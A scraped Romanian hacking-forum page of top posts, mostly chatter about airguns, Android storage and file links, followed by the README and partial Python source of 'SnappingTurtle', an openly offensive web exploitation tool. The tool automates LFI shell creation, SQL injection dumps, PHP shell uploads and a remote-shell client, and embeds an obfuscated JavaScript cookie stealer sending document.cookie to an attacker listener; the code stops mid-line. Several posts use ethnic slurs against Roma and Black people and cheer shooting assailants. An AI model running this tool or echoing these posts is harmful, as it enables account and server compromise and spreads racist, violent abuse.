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  1. Sunt sanse mai mari sa te calce un bmw condus de un tigan fara ocupatie, scoala si cu permis luat pe naspa. Infractorii oricum au arme. Si nu cu proiectile de cauciuc. @unic, welcome. Sa-ti cumperi macar un Fort 17R. In rest, pe piata sunt doar pocnitori.
    3 points
  2. Pizda rezolva asta. Tie iti lipseste pizda. Nu glumesc. Gandeste-te bine! Noroc!
    2 points
  3. Settings > Apps > External Storage > tap pe orice aplicatie > Move to sdcard
    2 points
  4. @Webz pt web development , cand o sa am timp mai urc https://mega.nz/#F!88o0XThL Key:!p9TxGapTQoHY4SbPitjVTg
    2 points
  5. Si eu de o sharoma medie fara maioneza,la pachet.
    2 points
  6. AGSQ iti transmite sa citesti, ori de cate ori te simti neputincios, paraclisul Maicii Domnului si sa vorbesti cu duhovnicul tau (fa-ti unul daca n-ai): http://www.doxologia.ro/ceaslov/paraclise/paraclisul-preasfintei-nascatoare-de-dumnezeu
    1 point
  7. Hahahahaha,asa iti zic aia,sa tragi in picior?Hahahahaha.Da ce pula mea e shotgun?E un cacat de pistol cu bile.Bile,intelegi?Adica daca bag niste pietricele in prastie,se duc cu mai multa viteza.Teava cu cornete face mai mult damage.Ce tara de sclavi,hahahahahha ce ma cac pe mine de ras.Aici in USA e simplu:a venit ala cu un cutit/sabie,simplu scoti pistolul(adevarat,nu de ala care se topeste la soare) si il impusti in cap.Caz inchis.Doar nu e mai importanta viata unei maimute negre sau tigan care ma ameninta pe degeaba decat viata unui om cinstit. Mda,ce sa astepti de la niste comunisti.Auzi,trebuie sa astepti sa vina salvarea sa-l ia pe agresor.Il impusti direct in cap si scapi lumea de un dindu nuffin.El scoate cutitul si tu sa-i tragi doar in picior,apoi sa chemi salvarea.Nu cumva trebuie sa-i faci respiratie gura la gura sau sa iti ceri iertare ca ai incercat sa te aperi?Hahahaha ce tara de cacat.Oricum infractorii fac rost de arme daca vor,e plin undernetul de asa ceva. Uitati efectul unei arme de astea neletale pe unul in pielea goala,atentie.Deja daca ai tricou,esti nemuritor: http://www.liveleak.com/view?i=703_1451876899 Ce tara de cacat,cum dracu au mai multe drepturi infractorii decat oamenii cinstiti?
    1 point
  8. Decryption key: !TSI7QEOaDqzx0rZdeYFGGkl_CijUPiE_2hrSntoeq0A https://mega.nz/#!6BRhQaRb
    1 point
  9. Revin cu uploadul la Advanced Ethical Hacking VTC.
    1 point
  10. Este android ul făcut prost. Ai 16gb memorie interna, dar îți dă voie sa folosești de ex doar 2gb pt aplicații. Sunt tutoriale pe net pentru asta. Trebuie sa ii dai root. Atenție! Rootarea duce la pierderea garanției. Sunt aplicații cu care poți face și un-root,dar dacă au chef sa caute vor afla ca telefonul a fost rootat.
    1 point
  11. Nu o sa mai vedem pe plaja tigani care vand pistoale "airsoft"
    1 point
  12. Daca vin 20 pe tine, chiar daca ai pistol, doar nu sunt retardati si te lasa sa tragi in ei, sa incarci si apoi sa tragi din nou in ei wtf? Esti putin cam paranoic, nu intra nimeni peste tine in casa sa te bata/omoare/futa in cur.
    1 point
  13. Settings > Apps > All > tap pe Google Play Store > Clear Cache Fă același lucru și cu Download Manager.
    1 point
  14. Incearca pe tpu. Aici nu prea ai nimerit. Sau daca vrei sa te futi in cur si nu stii cum sa o faci, poate aranjam ceva.
    1 point
  15. # SnappingTurtle: A Web Exploitation Tool A cross platform web exploitation tool written in Aphid and compiled into Python. Currently supports exploitation of PHP local file inclusion and SQL injection with more on the way. ## Command Line Arguments python st.py [exploitation strategy] [url] [inputs] ## Exploitation Strategies #### lfi Local file inclusion mode. Attempts to create a shell by exploiting PHP local file inclusion. Injection is performed using the $lfi token. #### sqli {options} SQL injection mode. Attempts to automatically exploit SQL injection vulnerabilities by querying information schemas. Injection is performed using the $sqli token. If used, one of two options must be specified: *list* - Dumps a list of databases and tables. *table {name}* - Dumps a database table. #### xss {server ip} Cross-site scripting mode. Currently only supports exploitation of reflected XSS via GET. Injection is performed using the $xss token. If used, a target accessible server IP must be specified for listening. #### upload Arbitrary upload. Write data to the server using the -f option. If used, at least one file must be specified using the -f option. Built-in shells can be injected using the $php token. #### shell {shell url} Connects to a previously created shell. ## Url The url to exploit. Can be injected into using tokens. ## Inputs #### -g {GET name} {GET value} GET data in key/value format. #### -p {POST name} {POST value} POST data in key/value format. #### --g {GET data} GET data in Python map format. #### --p {POST data} POST data in Python map format. #### -f {name} {filename} {file data} POST data as a file. ## Examples python st.py lfi http://localhost/lfiTest.php?theme=$lfi python st.py lfi http://localhost/lfiTest.php -g theme $lfi python st.py lfi http://localhost/lfiTest.php?theme=$lfi%00 python st.py lfi http://localhost/postTest.php --p "{'theme':'$lfi'}" python st.py sqli list http://localhost/sqliTest.php -g email $sqli python st.py sqli table sqlitest.users http://localhost/sqliTest.php -g email $sqli python st.py xss -g search $xss python st.py upload -f file shell.php $php python st.py shell ## Changelog ### 0.1.0324.1445 Added upload capability. Added shell connection support. Improved CLI output. Flipped GET/POST pair/obj args. Fixed SQL injection NULL bug. Fixed bug in table printing. Disabled urllib2 redirection. ### 0.1.0323.1150 Added support for XSS exploitation. Several bug fixes. ### 0.1.0322.749 Added support for SQL injection. Improved LFI exploitation support. CLI improvements. Several bug fixes. ### 0.1.0316.3 Initial release, supports LFI exploitation. st.py ################################################################ # Compiled from Aphid to Python by Boxelder 0.5.5926.31997 # https://github.com/John-Leitch/Aphid/releases ################################################################ def var_func_00000030(___p_op_8): return (___p_op_8.filename) def var_func_0000002C(___p_op_7): return (___p_op_7 > 1) def var_func_0000001D(___p_op_4): return (___p_op_4 != "<") def var_func_0000001C(___p_op_3): return (___p_op_3 != "#") def where(predicate, list): x = [] for element in list: if predicate(element): (x.append)(element) return x def select(selector, list): x = [] for y in list: (x.append)(selector(y)) return x def selectMany(selector, list): x = [] for y in list: for z in selector(y): (x.append)(z) return x def flatten(list): def var_func_00000000(x): return x return selectMany(var_func_00000000, list) def any(predicate, list): for element in list: if predicate(element): return True return False def all(predicate, list): for x in list: if not predicate(x): return False return True def first(predicate, list): for x in list: if predicate(x): return x def distinct(list): x = [] for y in list: if not (x.__contains__)(y): (x.append)(y) return x def iter(action, list): for x in list: action(x) count = len def concat(list, otherList): x = [] for y in otherList: (x.append)(y) for y in list: (x.append)(y) return x def skip(count, list): x = [] i = 0 for y in list: if (i >= count): (x.append)(y) i = (i + 1) return x def take(count, list): x = [] i = 0 for y in list: if (i < count): (x.append)(y) i = (i + 1) return x def aggr(acc, list): if (len(list) == 1): return list[0] else: s = list[0] for x in skip(1, list): s = acc(s, x) return s def join(sep, list): def var_func_00000001(x, y): return ((x + sep) + y) return aggr(var_func_00000001, list) def addAll(list): def var_func_00000002(x, y): return (x + y) return aggr(var_func_00000002, list) import os.path class File(): @staticmethod def appendAllText(filename, text): (File.writeText)(filename, text, "a") @staticmethod def writeAllText(filename, text): (File.writeText)(filename, text, "w") @staticmethod def writeText(filename, text, mode): file = open(filename, mode) (file.write)(text) (file.close)() @staticmethod def readAllText(filename): file = open(filename, "r") r = (file.read)() (file.close)() return r @staticmethod def exists(filename): return ((os.path).isfile)(filename) class CharRange(): @staticmethod def __alpha(start): def var_func_00000003(___p_op_0): return (___p_op_0 + 26) return (lambda var_00000000:select(chr, var_00000000))(range(ord(start), var_func_00000003(ord(start)))) @staticmethod def alphaLower(): return (CharRange.__alpha)("a") @staticmethod def alphaUpper(): return (CharRange.__alpha)("A") @staticmethod def alpha(): return (lambda var_00000001:concat((CharRange.alphaUpper)(), var_00000001))((CharRange.alphaLower)()) import json class JsonRepository(): repo = None def __init__(self, filename): (self.filename) = filename if (self.exists)(): (self.read)() else: (self.repo) = dict() def exists(self): return (File.exists)((self.filename)) def read(self): (self.repo) = (json.loads)((File.readAllText)((self.filename))) if not isinstance((self.repo), dict): (self.repo) = dict() def write(self): (lambda var_00000002:(File.writeAllText)((self.filename), var_00000002))((json.dumps)((self.repo))) def add(self, key, obj): (self.repo)[key] = obj (self.write)() def __getitem__(self, key): return ((self.repo).get)(key) def __setitem__(self, key, value): (self.repo)[key] = value class ExploitComponent(): def log(self, message): print(message) import string class HttpRequestTemplate(): encode = True def __init__(self, url, query = None, post = None, file = None): (self.url) = url (self.query) = query (self.post) = post (self.file) = file def getUrl(self, values): s = ((((string.Template)((self.url)).substitute)(values)) if ((((self.url) != None) and (values != None))) else ((((self.url)) if (((self.url) != None)) else ("")))) return ((((s + "?") + (self.getQuery)(values))) if ((self.hasQuery)()) else (s)) def hasQuery(self): return (((self.query) != None) and (len((self.query)) != 0)) def getQuery(self, values): return (self.__getData)((self.query), values) def getPost(self, values): return (self.__getData)((self.post), values) def getFile(self, values): def var_func_00000004(x): return HttpFile(((((string.Template)((x.name)).substitute)(values)) if ((((x.name) != None) and (values != None))) else ((((x.name)) if (((x.name) != None)) else ("")))), ((((string.Template)((x.filename)).substitute)(values)) if ((((x.filename) != None) and (values != None))) else ((((x.filename)) if (((x.filename) != None)) else ("")))), ((((string.Template)((x.data)).substitute)(values)) if ((((x.data) != None) and (values != None))) else ((((x.data)) if (((x.data) != None)) else ("")))), ((((string.Template)((x.type)).substitute)(values)) if ((((x.type) != None) and (values != None))) else ((((x.type)) if (((x.type) != None)) else (""))))) return ((None) if (((self.file) == None)) else ((lambda var_00000003:select(var_func_00000004, var_00000003))((self.file)))) def __getData(self, data, values): if (data == None): return None result = dict() for k in data: result[((((string.Template)(k).substitute)(values)) if (((k != None) and (values != None))) else (((k) if ((k != None)) else (""))))] = ((((string.Template)(data[k]).substitute)(values)) if (((data[k] != None) and (values != None))) else (((data[k]) if ((data[k] != None)) else ("")))) return (((urllib.urlencode)(result)) if ((self.encode)) else (result)) class HttpFile(): def __init__(self, name, filename, data, type = "text/plain"): (self.name) = name (self.filename) = filename (self.data) = data (self.type) = type import urllib2 from urllib import addinfourl from urllib2 import HTTPRedirectHandler class RedirectHandler(HTTPRedirectHandler): def http_error_302(self, req, fp, code, msg, headers): x = addinfourl(fp, headers, (req.get_full_url)()) (x.status) = code (x.code) = code return x http_error_300 = http_error_302 http_error_301 = http_error_302 http_error_303 = http_error_302 http_error_307 = http_error_302 (urllib2.install_opener)((urllib2.build_opener)(RedirectHandler())) from random import choice class MultipartFormData(): dispositionPrefix = "Content-Disposition: form-data; " typePrefix = "Content-Type: " multiPartPrefix = "multipart/form-data; boundary=" def __init__(self): (self.boundary) = (self.createBoundary)() (self.data) = "" def createBoundary(self): def var_func_00000005(x): return choice((CharRange.alpha)()) return (lambda var_00000004:join("", var_00000004))((lambda var_00000005:select(var_func_00000005, var_00000005))(range(0, 64))) def getBoundary(self, final = False): return ((("--" + (self.boundary)) + (("--") if (final) else (""))) + "\r\n") def addBoundary(self, final = False): (self.data) += (self.getBoundary)(final) def addDisposition(self, name, filename = None): (self.data) += (((self.dispositionPrefix) + ((("name=\"{}\"".format)(name)) if ((filename == None)) else (("name=\"{}\"; filename=\"{}\"".format)(name, filename)))) + "\r\n") def addType(self, type): (self.data) += (((self.typePrefix) + type) + "\r\n") def addLine(self, value = None): (self.data) += (((value) if ((value != None)) else ("")) + "\r\n") def addData(self, name, data): (self.addBoundary)() (self.addDisposition)(name) (self.addLine)() (self.addLine)(data) def addFileData(self, name, filename, type, data): (self.addBoundary)() (self.addDisposition)(name, filename) (self.addType)(type) (self.addLine)() (self.addLine)(data) def getContentType(self): return ((self.multiPartPrefix) + (self.boundary)) def __str__(self): return ((self.data) + (self.getBoundary)(final = True)) from urlparse import parse_qs class Http(ExploitComponent): contentType = "Content-Type" contentLength = "Content-Length" dataName = "name" dataFilename = "filename" dataType = "type" data = "data" @staticmethod def request(url, postData = None, fileData = None): print(("[?] %s" % url)) if (postData != None): print((" " + str(postData))) def var_func_00000006(x): return ("{{ {}, {}, {} }}".format)((x.name), (x.filename), (x.type)) if (fileData != None): tup = (lambda var_00000006:join(", ", var_00000006))((lambda var_00000007:select(var_func_00000006, var_00000007))(fileData)) print((" " + tup)) if (fileData == None): return ((urllib2.urlopen)(url, postData).read)() else: formData = (Http.createFormData)(postData, fileData) body = str(formData) req = (urllib2.Request)(url) (req.add_header)((Http.contentType), (formData.getContentType)()) (req.add_header)((Http.contentLength), str(len(body))) (req.add_data)(body) return ((urllib2.urlopen)(req).read)() @staticmethod def createFormData(postData = None, fileData = None): formData = MultipartFormData() if (postData != None): postValues = parse_qs(postData) for k in (postValues.keys)(): for v in postValues[k]: (formData.addData)(k, v) if (fileData != None): for f in fileData: (formData.addFileData)((f.name), (f.filename), (f.type), (f.data)) return formData class Payload(): def __init__(self, value): (self.value) = value def inject(self, target): return (((target % (self.value))) if ((target.__contains__)("%s")) else (target)) def injectData(self, target): if (target == None): return None data = dict() for k in target: v = target[k] data[(self.inject)(k)] = (self.inject)(v) return data class Injection(): def __init__(self, begin, end, nextExpression): (self.begin) = begin (self.end) = end (self.nextExpression) = nextExpression def __str__(self): return (((self.begin) + (self.nextExpression)()) + (self.end)) from random import randint class Shell(ExploitComponent): def __init__(self, createUrl, createPost = None): (self.createUrl) = createUrl (self.createPost) = createPost def run(self, cmd): u = (self.createUrl)(cmd) p = (((self.createPost)(cmd)) if (((self.createPost) != None)) else (None)) resp = (Http.request)(u, p) return resp @staticmethod def get(url): def var_func_00000007(cmd): return ((url + "?") + (urllib.urlencode)({"cmd": cmd})) return Shell(var_func_00000007) @staticmethod def post(url): def var_func_00000008(cmd): return url def var_func_00000009(cmd): return (urllib.urlencode)({"cmd": cmd}) return Shell(var_func_00000008, var_func_00000009) @staticmethod def open(url): print("[i] Detecting shell input") probe = str(randint(268435456, 4294967295)) probeCmd = ("echo %s" % probe) for f in [(Shell.post), (Shell.get)]: shell = f(url) result = (shell.run)(probeCmd) if (result.__contains__)(probe): print("[+] Shell input found") return shell print("[x] Could not find shell input") return None class ExploitEncoding(): key = [60, 159, 224, 114, 159, 230, 216, 94, 23, 190, 168, 12, 209, 198, 188, 191, 168, 255, 194, 242, 72, 124, 255, 231, 185, 153, 101, 80, 37, 111, 29, 106, 235, 199, 163, 78, 229, 209, 45, 102, 0, 23, 6, 208, 65, 8, 227, 181, 197, 44, 228, 1, 121, 189, 83, 192, 159, 248, 184, 5, 129, 136, 57, 167, 160, 62, 33, 9, 35, 109, 218, 214, 210, 92, 242, 49, 117, 47, 166, 177, 182, 175, 139, 248, 139, 27, 241, 46, 116, 226, 175, 237, 25, 39, 228, 120, 222, 94, 48, 3, 231, 217, 146, 88, 82, 13, 46, 28, 202, 34, 74, 112, 82, 7, 78, 209, 252, 64, 28, 132, 77, 242, 149, 64, 189, 236, 189, 170, 119, 122, 83, 23, 255, 162, 201, 221, 29, 51, 165, 125, 237, 212, 100, 81, 151, 63, 155, 17, 216, 19, 123, 157, 66, 171, 182, 245, 67, 81, 154, 102, 79, 131, 165, 80, 207, 51, 113, 175, 62, 113, 180, 201, 154, 158, 151, 120, 142, 67, 168, 126, 81, 172, 210, 100, 254, 181, 213, 83, 236, 212, 153, 203, 152, 63, 46, 105, 46, 19, 130, 100, 206, 235, 211, 103, 94, 178, 2, 163, 19, 61, 103, 0, 169, 28, 20, 163, 177, 65, 82, 25, 94, 29, 195, 105, 216, 233, 48, 91, 112, 45, 73, 122, 192, 68, 175, 101, 217, 106, 5, 76, 179, 49, 64, 174, 109, 153, 33, 124, 43, 138, 183, 237, 193, 105, 5, 177, 39, 105, 143, 116, 130, 167, 51, 229, 244, 236, 63, 100, 109, 174, 202, 71, 59, 5, 101, 44, 220, 21, 252, 63, 199, 180, 48, 229, 117, 92, 185, 87, 62, 254, 61, 111, 219, 144, 201, 12, 254, 90, 185, 128, 89, 189, 15, 124, 192, 112, 177, 187, 3, 216, 212, 18, 108, 80, 173, 206, 119, 77, 111, 151, 50, 231, 37, 110, 113, 90, 107, 170, 60, 89, 46, 130, 91, 123, 229, 10, 164, 180, 37, 5, 170, 253, 84, 102, 41, 43, 3, 138, 227, 251, 148, 177, 234, 34, 77, 114, 151, 160, 10, 102, 4, 7, 127, 169, 170, 82, 182, 240, 106, 162, 41, 195, 40, 106, 237, 53, 147, 191, 69, 69, 87, 224, 199, 64, 197, 125, 151, 57, 45, 115, 114, 4, 169, 191, 0, 163, 126, 170, 188, 215, 116, 18, 32, 64, 210, 209, 136, 128, 52, 24, 222, 216, 91, 196, 14, 35, 64, 62, 228, 44, 187, 125, 194, 247, 48, 36, 25, 105, 106, 73, 182, 233, 3, 109, 209, 68, 192, 134, 110, 243, 244, 22, 4, 21, 148, 154, 169, 228, 176, 220, 99, 63, 197, 143, 28, 246, 79, 40, 16, 173, 183, 31, 22, 235, 98, 245, 212, 237, 243, 202, 99, 185, 208, 241, 56, 164, 121, 173, 98, 149, 123, 53, 184, 141, 230, 119, 35, 115, 81, 218, 244, 152, 117, 193, 59, 212, 0, 25, 178, 159, 197, 187, 240, 230, 121, 169, 111, 212, 86, 119, 125, 161] @staticmethod def decode(value): i = 0 decoded = "" for x in value: decoded += chr((ord(x) ^ (ExploitEncoding.key)[i])) i = (i + 1) if (i == len((ExploitEncoding.key))): i = 0 return decoded from urlparse import urlparse, parse_qs from BaseHTTPServer import BaseHTTPRequestHandler class ExploitRequestHandler(BaseHTTPRequestHandler): def do_GET(self): uri = urlparse((self.path)) rsrc = (self.getFile)((uri.path)) query = parse_qs((uri.query)) print(("[i] Path: %s" % (self.path))) print(("[i] Resource: %s" % rsrc)) print(("[i] Referer: %s" % (self.getReferer)())) print(("[i] IP: {}:{}".format)((self.getIP)(), (self.getPort)())) hasContent = ((rsrc != None) and (rsrc != "")) if ((query != None) and (query != "")): (self.handleQuery)() else: if hasContent: (self.handleResource)() code = ((200) if ((((uri.query) != "") or hasContent)) else (404)) (self.send_response)(code) (self.send_header)("Access-Control-Allow-Origin", "*") (self.end_headers)() if hasContent: ((self.wfile).write)(rsrc) print("") def log_message(self, a = None, b = None, c = None, d = None, e = None, f = None, g = None, h = None, i = None, j = None, k = None, l = None, m = None, n = None, o = None, p = None): 0 def handleQuery(self): print(("[i] Message: %s" % (self.getMsg)())) def handleResource(self, rsrc): (self.send_header)("Content-type", "text/javascript") def getIP(self): return (self.client_address)[0] def getPort(self): return (self.client_address)[1] def getUrl(self): return urlparse((self.path)) def getQuery(self): return parse_qs(((self.getUrl)().query)) def getMsg(self): q = (self.getQuery)() keys = (q.keys)() return (((ExploitEncoding.decode)(q[keys[0]][0])) if ((len(keys) != 0)) else (None)) def getReferer(self): def var_func_0000000A(r): return ((r[0]) if ((len(r) != 0)) else (None)) return var_func_0000000A(((self.headers).getheaders)("referer")) def getFile(self, path): if (len(path) == 0): return None name = path[1:] text = (((self.server).payloads).get)(name) return text class ExploitResource(): @staticmethod def getScriptTag(host, port, name): return ("<script src=\"http://{}{}/{}\" type=\"text/javascript\"></script>".format)(host, (((":" + str(port))) if (((port != None) and (port != ""))) else ("")), name) @staticmethod def getJsCookieStealer(host, port): return (("\r\n // Todo: generate key and store in repo\r\n var key = [0x3C,0x9F,0xE0,0x72,0x9F,0xE6,0xD8,0x5E,0x17,0xBE,0xA8,0x0C,0xD1,0xC6,0xBC,0xBF,0xA8,0xFF,0xC2,0xF2,0x48,0x7C,0xFF,0xE7,0xB9,0x99,0x65,0x50,0x25,0x6F,0x1D,0x6A,0xEB,0xC7,0xA3,0x4E,0xE5,0xD1,0x2D,0x66,0x00,0x17,0x06,0xD0,0x41,0x08,0xE3,0xB5,0xC5,0x2C,0xE4,0x01,0x79,0xBD,0x53,0xC0,0x9F,0xF8,0xB8,0x05,0x81,0x88,0x39,0xA7,0xA0,0x3E,0x21,0x09,0x23,0x6D,0xDA,0xD6,0xD2,0x5C,0xF2,0x31,0x75,0x2F,0xA6,0xB1,0xB6,0xAF,0x8B,0xF8,0x8B,0x1B,0xF1,0x2E,0x74,0xE2,0xAF,0xED,0x19,0x27,0xE4,0x78,0xDE,0x5E,0x30,0x03,0xE7,0xD9,0x92,0x58,0x52,0x0D,0x2E,0x1C,0xCA,0x22,0x4A,0x70,0x52,0x07,0x4E,0xD1,0xFC,0x40,0x1C,0x84,0x4D,0xF2,0x95,0x40,0xBD,0xEC,0xBD,0xAA,0x77,0x7A,0x53,0x17,0xFF,0xA2,0xC9,0xDD,0x1D,0x33,0xA5,0x7D,0xED,0xD4,0x64,0x51,0x97,0x3F,0x9B,0x11,0xD8,0x13,0x7B,0x9D,0x42,0xAB,0xB6,0xF5,0x43,0x51,0x9A,0x66,0x4F,0x83,0xA5,0x50,0xCF,0x33,0x71,0xAF,0x3E,0x71,0xB4,0xC9,0x9A,0x9E,0x97,0x78,0x8E,0x43,0xA8,0x7E,0x51,0xAC,0xD2,0x64,0xFE,0xB5,0xD5,0x53,0xEC,0xD4,0x99,0xCB,0x98,0x3F,0x2E,0x69,0x2E,0x13,0x82,0x64,0xCE,0xEB,0xD3,0x67,0x5E,0xB2,0x02,0xA3,0x13,0x3D,0x67,0x00,0xA9,0x1C,0x14,0xA3,0xB1,0x41,0x52,0x19,0x5E,0x1D,0xC3,0x69,0xD8,0xE9,0x30,0x5B,0x70,0x2D,0x49,0x7A,0xC0,0x44,0xAF,0x65,0xD9,0x6A,0x05,0x4C,0xB3,0x31,0x40,0xAE,0x6D,0x99,0x21,0x7C,0x2B,0x8A,0xB7,0xED,0xC1,0x69,0x05,0xB1,0x27,0x69,0x8F,0x74,0x82,0xA7,0x33,0xE5,0xF4,0xEC,0x3F,0x64,0x6D,0xAE,0xCA,0x47,0x3B,0x05,0x65,0x2C,0xDC,0x15,0xFC,0x3F,0xC7,0xB4,0x30,0xE5,0x75,0x5C,0xB9,0x57,0x3E,0xFE,0x3D,0x6F,0xDB,0x90,0xC9,0x0C,0xFE,0x5A,0xB9,0x80,0x59,0xBD,0x0F,0x7C,0xC0,0x70,0xB1,0xBB,0x03,0xD8,0xD4,0x12,0x6C,0x50,0xAD,0xCE,0x77,0x4D,0x6F,0x97,0x32,0xE7,0x25,0x6E,0x71,0x5A,0x6B,0xAA,0x3C,0x59,0x2E,0x82,0x5B,0x7B,0xE5,0x0A,0xA4,0xB4,0x25,0x05,0xAA,0xFD,0x54,0x66,0x29,0x2B,0x03,0x8A,0xE3,0xFB,0x94,0xB1,0xEA,0x22,0x4D,0x72,0x97,0xA0,0x0A,0x66,0x04,0x07,0x7F,0xA9,0xAA,0x52,0xB6,0xF0,0x6A,0xA2,0x29,0xC3,0x28,0x6A,0xED,0x35,0x93,0xBF,0x45,0x45,0x57,0xE0,0xC7,0x40,0xC5,0x7D,0x97,0x39,0x2D,0x73,0x72,0x04,0xA9,0xBF,0x00,0xA3,0x7E,0xAA,0xBC,0xD7,0x74,0x12,0x20,0x40,0xD2,0xD1,0x88,0x80,0x34,0x18,0xDE,0xD8,0x5B,0xC4,0x0E,0x23,0x40,0x3E,0xE4,0x2C,0xBB,0x7D,0xC2,0xF7,0x30,0x24,0x19,0x69,0x6A,0x49,0xB6,0xE9,0x03,0x6D,0xD1,0x44,0xC0,0x86,0x6E,0xF3,0xF4,0x16,0x04,0x15,0x94,0x9A,0xA9,0xE4,0xB0,0xDC,0x63,0x3F,0xC5,0x8F,0x1C,0xF6,0x4F,0x28,0x10,0xAD,0xB7,0x1F,0x16,0xEB,0x62,0xF5,0xD4,0xED,0xF3,0xCA,0x63,0xB9,0xD0,0xF1,0x38,0xA4,0x79,0xAD,0x62,0x95,0x7B,0x35,0xB8,0x8D,0xE6,0x77,0x23,0x73,0x51,0xDA,0xF4,0x98,0x75,0xC1,0x3B,0xD4,0x00,0x19,0xB2,0x9F,0xC5,0xBB,0xF0,0xE6,0x79,0xA9,0x6F,0xD4,0x56,0x77,0x7D,0xA1];\r\n \r\n var alphaNum = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\";\r\n var nextInt = function(max) { return Math.floor(Math.random() * max); };\r\n var nextChar = function() { return alphaNum[nextInt(alphaNum.length)]; };\r\n \r\n var nextName = function() {\r\n var len = nextInt(0x10);\r\n var name = \"\";\r\n for (var i = 0; i < len; i++) name += nextChar();\r\n \r\n return name;\r\n };\r\n \r\n var applyKey = function(value, key, apply) {\r\n var keyIndex = 0;\r\n var applied = \"\";\r\n \r\n for (var i = 0; i < value.length; i++) {\r\n applied += apply(value.charCodeAt(i), key[keyIndex]);\r\n if (++keyIndex == key.length) keyIndex = 0;\r\n }\r\n \r\n return applied;\r\n };\r\n \r\n var encode = function(value, key) {\r\n return applyKey(value, key, function(v, k) {\r\n return String.fromCharCode(v ^ k);\r\n }); \r\n };\r\n \r\n var xhr = window.XMLHttpRequest ? \r\n new XMLHttpRequest() : \r\n new ActiveXObject(\"Microsoft.XMLHTTP\");\r\n \r\n var sendValue = function(v) {\r\n var k = nextName();\r\n var qs = k + \"=\" + escape(encode(v, key));\r\n xhr.open(\"GET\", \"http://{host}:{port}/?\" + qs, true);\r\n xhr.onreadystatechange = function (e) {\r\n if (xhr.readyState == 4 && xhr.status != 200) {\r\n console.log(xhr.statusText);\r\n }\r\n }; \r\n xhr.send(); \r\n };\r\n \r\n try {\r\n sendValue(\"Cookie => \" + document.cookie);\r\n } catch (err) { alert(err); }\r\n ".replace)("{host}", host).replace)("{port}", str(port)) from random import randint, choice from BaseHTTPServer import HTTPServer class ExploitServerConfig(): portKey = "port" cookieStealerKey = "cookieStealer" alpha = (CharRange.alpha)() serverRepo = JsonRepository("server.json") @staticmethod def nextPort(): return randint(49152, 65535) @staticmethod def nextName(): def var_func_0000000B(x): return choice((ExploitServerConfig.alpha)) return (lambda var_00000008:join("", var_00000008))((lambda var_00000009:select(var_func_0000000B, var_00000009))(range(0, randint(4, 16)))) @staticmethod def getPort(): def var_func_0000000C(): return (ExploitServerConfig.serverRepo)[(ExploitServerConfig.portKey)] return (ExploitServerConfig.getValue)(var_func_0000000C) @staticmethod def getCookieStealer(): def var_func_0000000D(): return (ExploitServerConfig.serverRepo)[(ExploitServerConfig.cookieStealerKey)] return (ExploitServerConfig.getValue)(var_func_0000000D) @staticmethod def getValue(f): (ExploitServerConfig.ensure)() return f() @staticmethod def ensure(): if ((ExploitServerConfig.serverRepo)[(ExploitServerConfig.portKey)] == None): (ExploitServerConfig.generate)() @staticmethod def generate(): (ExploitServerConfig.serverRepo)[(ExploitServerConfig.portKey)] = (ExploitServerConfig.nextPort)() (ExploitServerConfig.serverRepo)[(ExploitServerConfig.cookieStealerKey)] = (ExploitServerConfig.nextName)() ((ExploitServerConfig.serverRepo).write)() class XssExploit(): def __init__(self, server, tmpl): (self.server) = server (self.tmpl) = tmpl def __str__(self): if (((tmpl.post) != None) and (len((tmpl.post)) > 0)): print("[X] POST XSS not yet supported") quit() return (tmpl.getUrl)({"xss": ((self.server).scriptTag)}) class ExploitServer(ExploitComponent): port = (ExploitServerConfig.getPort)() cookieStealer = (ExploitServerConfig.getCookieStealer)() def __init__(self, ip): (self.ip) = ip endpoint = (self.ip), (self.port) (self.server) = HTTPServer(endpoint, ExploitRequestHandler) ((self.server).payloads) = dict() ((self.server).payloads)[(self.cookieStealer)] = (ExploitResource.getJsCookieStealer)((self.ip), (self.port)) (self.scriptTag) = (ExploitResource.getScriptTag)((self.ip), (self.port), (self.cookieStealer)) def createExploit(self, tmpl): return str(XssExploit(self, tmpl)) def serveForever(self): (self.log)(("[?] Listening on {}:{}".format)((self.ip), (self.port))) ((self.server).serve_forever)() class SqlEmitter(): alpha = (CharRange.alpha)() def getChars(self): def var_func_0000000E(___p_op_1): return (___p_op_1 != (self.quote)()) return (lambda var_0000000A:select(chr, var_0000000A))((lambda var_0000000B:where(var_func_0000000E, var_0000000B))(range(32, 128))) def tup(self, vals): def var_func_0000000F(x, y): return (((x + ",") + (self.space)()) + y) return (lambda var_0000000C:aggr(var_func_0000000F, var_0000000C))(vals) def words(self, words): def var_func_00000010(x, y): return ((x + (self.space)()) + y) return (lambda var_0000000D:aggr(var_func_00000010, var_0000000D))(words) def space(self): return " " def quote(self): return "'" def junkCharRange(self): def var_func_00000011(x): return choice((self.alpha)) return (lambda var_0000000E:join("", var_0000000E))((lambda var_0000000F:select(var_func_00000011, var_0000000F))((lambda var_00000010:range(0, var_00000010))(randint(8, 32)))) def junkString(self): return ("{1}{0}{1}".format)((self.junkCharRange)(), (self.quote)()) def unionAll(self, cols): return (self.words)(["UNION", "SELECT", "ALL", (self.tup)(cols)]) def comment(self): return "#" class SqlUnionOutputInfo(): def __init__(self, begin, end, columnCount, columnNumber): (self.begin) = begin (self.end) = end (self.columnCount) = columnCount (self.columnNumber) = columnNumber class SqlUnionProbe(ExploitComponent): emitter = SqlEmitter() output = None begins = ["'", "\"", "-1 ", "0 ", ""] ends = ["#", "--", ""] def __init__(self, httpTemplate, maxColumns = 32): (self.httpTemplate) = httpTemplate (self.maxColumns) = maxColumns def findOutput(self): (self.emitter) = SqlEmitter() columns = 0 (self.log)("[?] Searching for union count and output") def var_func_00000012(x): return ((self.emitter).junkString)() def var_func_00000013(x): return ((x.lstrip)(quote).rstrip)(quote) def var_func_00000014(___p_op_2): return (___p_op_2 != 0) while True: columns = (columns + 1) for begin in (self.begins): for end in (self.ends): cols = (lambda var_00000011:select(var_func_00000012, var_00000011))(range(0, columns)) quote = cols[0][0] colVals = (lambda var_00000012:select(var_func_00000013, var_00000012))(cols) resp = (self.sendRequest)((self.createInjection)(begin, end, cols)) matches = (lambda var_00000013:where((resp.__contains__), var_00000013))(colVals) if var_func_00000014(len(matches)): offset = (colVals.index)(matches[0]) msg = ("\r\n[+] Output found: Columns={}, Offset={}\r\n".format)(columns, offset) (self.log)(msg) return SqlUnionOutputInfo(begin, end, columns, offset) if (columns >= (self.maxColumns)): return None def inject(self, columns, table, where = None): def hasOutput(): return ((self.output) != None) if not hasOutput(): (self.output) = (self.findOutput)() if not hasOutput(): (self.log)("[X] Could not find output for injection\r\n") return None injector = 